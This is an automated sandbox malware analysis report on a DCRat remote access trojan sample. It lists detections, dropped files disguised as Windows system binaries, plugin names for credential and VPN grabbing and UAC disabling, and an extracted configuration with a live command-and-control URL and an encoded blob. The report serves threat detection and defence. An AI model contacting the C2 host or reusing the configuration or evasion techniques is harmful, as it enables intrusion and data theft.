Windows Analysis Report
Mt6QkZnVbc.exe

Overview

General Information

Sample name:	Mt6QkZnVbc.exe renamed because original name is a hash value
Original sample name:	49267a1e4c9cbb955209690e1d82d1d1.exe
Analysis ID:	1427111
MD5:	49267a1e4c9cbb955209690e1d82d1d1
SHA1:	47fb7d48398a2049f84c4a68c96ea5ac27513cbe
SHA256:	1fbcb895a6e34fb2a307c0c9896b7922ea723e5eea183fa319c0142c5a761fdf
Tags:	DCRatexe
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected DCRat

.NET source code contains potential unpacker

.NET source code contains very large strings

C2 URLs / IPs found in malware configuration

Creates processes via WMI

Disable UAC(promptonsecuredesktop)

Disables UAC (registry)

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: System File Execution Location Anomaly

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Mt6QkZnVbc.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Recovery\dwm.exe	Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Recovery\RCX67AA.tmp	Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Windows\SKB\LanguageModels\RCX6E93.tmp	Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Program Files\Windows Portable Devices\RCX7115.tmp	Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Program Files (x86)\Google\RCX75E9.tmp	Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Recovery\RCX786B.tmp	Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Users\user\Desktop\RCX6567.tmp	Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Recovery\RCX6C11.tmp	Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Recovery\services.exe	Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Recovery\sihost.exe	Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Program Files (x86)\Windows Mail\RCX69BF.tmp	Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Avira: detection malicious, Label: HEUR/AGEN.1310064

Found malware configuration

Source: 0.0.Mt6QkZnVbc.exe.ec0000.0.unpack

Malware Configuration Extractor: DCRat {"SCRT": "{\"b\":\"-\",\"B\":\"^\",\"1\":\",\",\"a\":\"@\",\"I\":\" \",\"2\":\";\",\"T\":\"&\",\"L\":\"<\",\"z\":\"~\",\"j\":\"%\",\"M\":\"$\",\"w\":\"!\",\"S\":\"`\",\"y\":\"_\",\"F\":\"|\",\"k\":\"(\",\"J\":\"#\",\"u\":\")\",\"W\":\"*\",\"n\":\".\",\"O\":\">\"}", "PCRT": "{\"U\":\"(\",\"J\":\"&\",\"M\":\"#\",\"N\":\"!\",\"G\":\",\",\"C\":\"~\",\"Y\":\";\",\"H\":\"-\",\"R\":\".\",\"D\":\" \",\"B\":\"%\",\"p\":\"<\",\"W\":\"$\",\"h\":\")\",\"I\":\"|\",\"F\":\"^\",\"5\":\"_\",\"Q\":\"*\",\"Z\":\">\",\"n\":\"`\",\"e\":\"@\"}", "TAG": "", "MUTEX": "DCR_MUTEX-ePGv71Xi6eHATgLCXbMW", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 1, "AUR": 1, "AURD": "{C:}/Program Files/WinRAR", "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://a0941979.xsph.ru/@zd3bk5Wa3RHb1FmZlR0X", "H2": "http://a0941979.xsph.ru/@zd3bk5Wa3RHb1FmZlR0X", "T": "0"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	ReversingLabs: Detection: 81%
Source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Virustotal: Detection: 81%	Perma Link
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	ReversingLabs: Detection: 81%
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Virustotal: Detection: 81%	Perma Link
Source: C:\Program Files\Windows Portable Devices\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	ReversingLabs: Detection: 81%
Source: C:\Program Files\Windows Portable Devices\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Virustotal: Detection: 81%	Perma Link
Source: C:\Recovery\dwm.exe	ReversingLabs: Detection: 81%
Source: C:\Recovery\dwm.exe	Virustotal: Detection: 81%	Perma Link
Source: C:\Recovery\services.exe	ReversingLabs: Detection: 81%
Source: C:\Recovery\services.exe	Virustotal: Detection: 81%	Perma Link
Source: C:\Recovery\sihost.exe	ReversingLabs: Detection: 81%
Source: C:\Recovery\sihost.exe	Virustotal: Detection: 81%	Perma Link
Source: C:\Windows\SKB\LanguageModels\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	ReversingLabs: Detection: 81%
Source: C:\Windows\SKB\LanguageModels\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Virustotal: Detection: 81%	Perma Link
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	ReversingLabs: Detection: 81%
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Virustotal: Detection: 81%	Perma Link

Multi AV Scanner detection for submitted file

Source: Mt6QkZnVbc.exe	ReversingLabs: Detection: 81%
Source: Mt6QkZnVbc.exe	Virustotal: Detection: 81%			Perma Link

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Joe Sandbox ML: detected
Source: C:\Recovery\dwm.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Joe Sandbox ML: detected
Source: C:\Recovery\services.exe	Joe Sandbox ML: detected
Source: C:\Recovery\sihost.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Mt6QkZnVbc.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: Mt6QkZnVbc.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Directory created: C:\Program Files\Windows Portable Devices\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Jump to behavior
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Directory created: C:\Program Files\Windows Portable Devices\5d095569012eb4	Jump to behavior
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Directory created: C:\Program Files\Windows Portable Devices\RCX7115.tmp	Jump to behavior

Source: Mt6QkZnVbc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File opened: C:\Users\user\AppData	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://a0941979.xsph.ru/@zd3bk5Wa3RHb1FmZlR0X

Yara detected Generic Downloader

Source: Yara match	File source: Mt6QkZnVbc.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Mt6QkZnVbc.exe.ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Windows\SKB\LanguageModels\RCX6E93.tmp, type: DROPPED
Source: Yara match	File source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\ServiceProfiles\LocalService\Desktop\RCX73C5.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\RCX786B.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Mail\RCX69BF.tmp, type: DROPPED
Source: Yara match	File source: C:\Recovery\RCX67AA.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\RCX75E9.tmp, type: DROPPED
Source: Yara match	File source: C:\Recovery\sihost.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Portable Devices\RCX7115.tmp, type: DROPPED
Source: Yara match	File source: C:\Recovery\dwm.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\RCX6C11.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Desktop\RCX6567.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\services.exe, type: DROPPED

Source: Mt6QkZnVbc.exe, 00000000.00000002.1814092338.00000000032D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Mt6QkZnVbc.exe, 00000000.00000002.1832340256.000000001C316000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3kta
Source: Mt6QkZnVbc.exe, 00000000.00000002.1832340256.000000001C316000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmogram

System Summary

Malicious sample detected (through community Yara rule)

Source: Mt6QkZnVbc.exe, type: SAMPLE	Matched rule: DCRat payload Author: ditekSHen
Source: 0.0.Mt6QkZnVbc.exe.ec0000.0.unpack, type: UNPACKEDPE	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Windows\SKB\LanguageModels\RCX6E93.tmp, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\RCX73C5.tmp, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Recovery\RCX786B.tmp, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Program Files (x86)\Windows Mail\RCX69BF.tmp, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Recovery\RCX67AA.tmp, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Program Files (x86)\Google\RCX75E9.tmp, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Recovery\sihost.exe, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Program Files\Windows Portable Devices\RCX7115.tmp, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Recovery\dwm.exe, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Recovery\RCX6C11.tmp, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Users\user\Desktop\RCX6567.tmp, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Recovery\services.exe, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen

.NET source code contains very large strings

Source: Mt6QkZnVbc.exe, Ba5.cs

Long String: Length: 469152

Creates files inside the system directory

Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Windows\SKB\LanguageModels\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Jump to behavior
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Windows\SKB\LanguageModels\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Windows\SKB\LanguageModels\5d095569012eb4	Jump to behavior
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Windows\ServiceProfiles\LocalService\Desktop\7ccfebd9e92364	Jump to behavior
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Windows\SKB\LanguageModels\RCX6E93.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	File created: C:\Windows\ServiceProfiles\LocalService\Desktop\RCX73C5.tmp	Jump to behavior

Deletes files inside the Windows folder

Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe

File deleted: C:\Windows\ServiceProfiles\LocalService\Desktop\RCX73C5.tmp

Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Code function: 0_2_00007FFD9B8790B4	0_2_00007FFD9B8790B4
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Code function: 0_2_00007FFD9B88309D	0_2_00007FFD9B88309D
Source: C:\Users\user\Desktop\Mt6QkZnVbc.exe	Code function: 0_2_00007FFD9B870F80	0_2_00007FFD9B870F80
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Code function: 13_2_00007FFD9B8B0F88	13_2_00007FFD9B8B0F88
Source: C:\Program Files (x86)\Windows Mail\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe	Code function: 15_2_00007FFD9B8A5141	15_2_00007FFD9B8A5141
Source: C:\Recovery\dwm.exe	Code function: 18_2_00007FFD9B890F88	18_2_00007FFD9B890F88
Source: C:\Recovery\dwm.exe	Code function: 19_2_00007FFD9B8A0F88	19_2_00007FFD9B8A0F88
Source: C:\Recovery\services.exe	Code function: 22_2_00007FFD9B8A5141	22_2_00007FFD9B8A5141
Source: C:\Recovery\services.exe	Code function: 24_2_00007FFD9B875141	24_2_00007FFD9B875141
Source: C:\Recovery\sihost.exe	Code function: 35_2_00007FFD9B895141	35_2_00007FFD9B895141
Source: C:\Recovery\sihost.exe	Code function: 36_2_00007FFD9B8B5141	36_2_00007FFD9B8B5141
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Code function: 37_2_00007FFD9B8A5141	37_2_00007FFD9B8A5141
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Code function: 38_2_00007FFD9B895141	38_2_00007FFD9B895141
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe	Code function: 39_2_00007FFD9B8A5141	39_2_00007FFD9B8A5141

Source: Mt6QkZnVbc.exe, 00000000.00000002.1834404756.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename4 vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1833776233.000000001C5E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRegEditorPlugin.dclib4 vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1831177564.000000001BBE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1821121468.0000000013454000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename$ vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1835516693.000000001C610000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameUSBSpread.dll4 vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1840828053.000000001C7CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamekOqIuwMEeO9OzX.exe@ vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1814092338.0000000003B79000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1814092338.0000000003B79000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLpfieQBsDPgEKgg.exeD vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1814092338.0000000003B79000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1814092338.0000000003950000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1814092338.0000000003950000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameniVD4fdxO48.exe vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1814092338.0000000003950000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1814092338.0000000003950000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameniVD4fdxO48.exeD vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1834833653.000000001C600000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1838999865.000000001C640000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1833595298.000000001C3D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename4 vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1832904401.000000001C390000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1854263821.000000001C8C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameojIckCGKeaTDDtL0f@ vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000000.1690631223.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamekOqIuwMEeO9OzX.exe@ vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1831005329.000000001BBA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename$ vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1832340256.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileNamew vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1836549677.000000001C620000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameUserPingCounter.dclib4 vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1831099502.000000001BBC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBSoDProtection.dclib4 vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1832955052.000000001C3A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMiscInfoGrabber.dclib4 vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1814092338.0000000003A67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1833548960.000000001C3C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamePerformanceCounter.dclib4 vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1831274570.000000001BC10000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDisableUAC.dclib4 vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1833461058.000000001C3B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameOBSGrabber.dclib4 vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1814092338.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1838896721.000000001C630000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameVPNGrabber.dclib4 vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1831129714.000000001BBD0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBuildInstallationTweaksPlugin.dll\ vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe, 00000000.00000002.1831243375.000000001BC00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCrashLogger.dclib4 vs Mt6QkZnVbc.exe
Source: Mt6QkZnVbc.exe	Binary or memory string: OriginalFilenamekOqIuwMEeO9OzX.exe@ vs Mt6QkZnVbc.exe

Source: Mt6QkZnVbc.exe, type: SAMPLE	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: 0.0.Mt6QkZnVbc.exe.ec0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Windows\SKB\LanguageModels\RCX6E93.tmp, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\UserOOBEBroker.exe, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Windows\ServiceProfiles\LocalService\Desktop\RCX73C5.tmp, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Recovery\RCX786B.tmp, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Program Files (x86)\Windows Mail\RCX69BF.tmp, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Recovery\RCX67AA.tmp, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Program Files (x86)\Google\RCX75E9.tmp, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Recovery\sihost.exe, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Program Files\Windows Portable Devices\RCX7115.tmp, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Recovery\dwm.exe, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Recovery\RCX6C11.tmp, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Users\user\Desktop\RCX6567.tmp, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Program Files (x86)\Google\BxpXDwLzzgPDKkwHFtsUbGgAjn.exe, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Recovery\services.exe, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload

Source: Mt6QkZnVbc.exe, Q69.cs	Cryptographic APIs: 'TransformBlock'
Source: Mt6QkZnVbc.exe, Q69.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Mt6QkZnVbc.exe, Q69.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'

Source: Mt6QkZnVbc.exe, 277.cs	Base64 encoded string: 'H4sIAAAAAAAEAFXSXZOaMBQG4B/UG7OduutlQYFkBUogR+AO8YNg1O3gqvTXNywvM+0FQ545LycnGRb0UnfeuZxzVzrCXZso2DblOdZvM/WfQ0r0Q/OFcPNZlBe+k66PStdG+tt7Oat724dI8/qj5XXj7xonqFqRFya68Pp24XPeSz8ae2pOSfpjU+WLvjbPTWV7bRvxvbyLQN1nl3j5lXdlSsOeaTjnWpF34t2qtXOwxLU9+mvLVURZZtfsa82UzZZ/npvibGcIxEr+60h6Mhz2rinTDUvCnU9Oo8qXk7951u0ucKi8HUkqouwgWLISOtbwcG5t9wi8FU138NM+dsbc2Hdn30f4E/7GR1fwb1jCB+QZH72HfdTfYAF/4PsrfILzKQ8/YAO703zwCv6EU/gGc/gVLqfzYJ4l3KEewA0cwy0cwWf4Hb7CZP063HVi1NIxvOPpQT/ML/vE+sHs3Xtru16PNlv4HXUaTTDtRjOOfDram/IVfEBdIp/j+z3qBfIK/dGPob8nkMd8BBv0N1P/qR/O403nQd7D/CxGPkQe+9E0fwIXMO6DkDeY3ySYZ7ovm2f74d9V9p/ORL//C61hzBDwAwAA', 